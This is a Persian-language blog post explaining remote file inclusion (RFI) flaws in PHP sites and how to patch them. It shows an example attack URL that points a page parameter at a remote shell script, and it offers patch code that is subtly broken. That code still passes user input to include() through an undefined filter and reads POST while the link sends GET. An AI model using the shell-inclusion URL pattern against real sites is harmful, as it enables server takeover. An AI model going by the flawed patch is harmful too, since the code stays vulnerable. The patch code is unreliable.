crazy8
crazy8
خواندن ۳ دقیقه·۵ سال پیش

چرا حفره امنیتی rfi خطرناک است؟

آموزش باگ rfi
آموزش باگ rfi

با سلام خدمت دوستان عزیز بنده crazy8 هستم و درخدمتتون هستم با آموزش باگ rfi .

با توجه به اینکه میتوان در وب اپلیکیشن ها باگ های مختلفی را مشاهده کرد در نتیجه بد نیست تا با این باگ ها آشنایی پیدا کنیم چرا که ممکن است همین باگ یا حفره امنیتی در وب سایت ما وجود داشته باشد

خب دوستان بنده یک توضیح مختصری درمورد خود باگ در خدمتتون عرض میکنم که متوجه بشید اصلا باگ در وب اپلیکیشن ها یا ... چیست!

باگ ها یا خطا ها یا اصطلاحا حفره های امنیتی بسیار خطرناک هستند و توسط اشتباه برنامه نویس ها به وجود می آیند در واقع وقتی یک باگ به وجود می آید که در سورس آن وب سایت یا ... از قطعه کد های منسوخ شده یا متد های نا امن استفاده شود و یا حتی برنامه نویس آشنایی با پچ باگ ها نداشته باشد و منجر به ایجاد یک باگ خطرناک شود.

حال بریم سراغ اینکه باگ rfi چیست!

باگ rfi نیز مانند باگ های دیگر در سطح وب اپلیکیشن ها بسیار خطرناک است ، نام این باگ مخفف remote file inclusion هست و فرد مهاجم با سواستفاده از این باگ میتواند شل اسکریپت خود را داخل سرور سایت مستقیما اجرا کند و دسترسی نسبتا کاملی را از سرور هدف دریافت کند و بتواند عمل مخربانه خود را انجام دهد

باگ rfi باگی است که حتما باید به آن دقت داشته باشید و حتما چک کنید که سایت شما از این باگ برخوردار نباشد و در سایتتان باید از فایروال های قدرتمند استفاده کنید و همچنین ورودی های سایت را کنترل کنید چون روش ورود و شنود از طریق باگ rfi توسط ورودی های سایت انجام میشود

به طور مثال ورودی سایت شما به شکل زیر میباشد

https://mr-crazy8.tk/test.php?m=19

حال اگر ورودی سایت شما دارای این باگ باشد فرد هکر مسیر شل اسکریپت خود را در ورودی موجود جایگزین میکند و شل اسکریپت اجرا و دسترسی نسبتا کاملی را به فرد هکر میدهد

مثال :

https://mr-crazy8.tk/test.php?m=https://test.com/shell.txt

پچ باگ rfi

خب دوستان برای پچ باگ rfi میتوانید در ورودی ها فیلتر هایی رو بزارید و یا فایل php.ini را ادیت کنید و کد زیر را اضافه یا ویرایش کنید :

allow_url_fopen = off

البته که ممکن است این قطعه کد چندان تاثیری نداشته باشد و قابل دور زدن است اما باز هم ممکن است موثر باشد

قطعه کد دیگری که میتواند موثر باشد :

html : <a href=index.php?page=file1.php>Crazy8</a> php : <?php $page = cleanAll($_POST[page]); include($page); ?>

در قطعه کد بالا ما فیلتر هایی را برای ورودی اعمال کردیم و یک کد موثر تر به سرور جهت پردازش تحویل میدهیم

برای ارتباط با من در تلگرام کلیک کنید.

موفق و پیروز باشید!

امنیتrfiتست نفوذباگ rfi
برنامه نویس و علاقه مند به حوزه امنیت و تست نفوذ
شاید از این پست‌ها خوشتان بیاید